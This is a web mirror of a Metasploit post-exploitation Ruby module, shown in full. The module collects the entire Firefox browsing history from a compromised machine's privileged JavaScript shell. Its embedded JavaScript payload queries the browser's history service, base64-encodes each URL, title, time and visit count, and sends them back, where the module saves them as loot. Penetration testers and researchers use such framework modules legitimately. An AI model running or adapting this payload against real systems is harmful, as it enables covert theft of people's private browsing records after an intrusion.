Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/firefox/gather/history.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'json'

7


8
class MetasploitModule < Msf::Post

9
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Firefox Gather History from Privileged JavaScript Shell',

16
        'Description' => %q{

17
          This module allows collection of the entire browser history from a Firefox

18
          Privileged JavaScript Shell.

19
        },

20
        'License' => MSF_LICENSE,

21
        'Author' => [ 'joev' ],

22
        'DisclosureDate' => '2014-04-11',

23
        'Notes' => {

24
          'Stability' => [CRASH_SAFE],

25
          'SideEffects' => [],

26
          'Reliability' => []

27
        }

28
      )

29
    )

30


31
    register_options([

32
      OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])

33
    ])

34
  end

35


36
  def run

37
    results = js_exec(js_payload)

38
    if results.present?

39
      begin

40
        history = JSON.parse(results)

41
        history.each do |entry|

42
          entry.each_key { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }

43
        end

44


45
        file = store_loot('firefox.history.json', 'text/json', rhost, history.to_json)

46
        print_good("Saved #{history.length} history entries to #{file}")

47
      rescue JSON::ParserError

48
        print_warning(results)

49
      end

50
    end

51
  end

52


53
  def js_payload

54
    %|

55
      (function(send){

56
        try {

57
          var service = Components

58
                .classes["@mozilla.org/browser/nav-history-service;1"]

59
                .getService(Components.interfaces.nsINavHistoryService);

60
          var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;

61


62
          var query = service.getNewQuery();

63
          var options = service.getNewQueryOptions();

64
          var result = service.executeQuery(query, options);

65
          var fields = [];

66
          var entries = [];

67


68
          var root = result.root;

69
          root.containerOpen = true;

70


71
          for (var i = 0; i < result.root.childCount; ++i) {

72
            var child = result.root.getChild(i);

73
            if (child.type == child.RESULT_TYPE_URI) {

74
              entries.push({

75
                uri: b64(child.uri),

76
                title: b64(child.title),

77
                time: b64(child.time),

78
                accessCount: b64(child.accessCount)

79
              });

80
            }

81
          }

82


83
          result.root.containerOpen = false;

84


85
          send(JSON.stringify(entries));

86
        } catch (e) {

87
          send(e);

88
        }

89
      })(this.send);

90
    |.strip

91
  end

92
end

93


94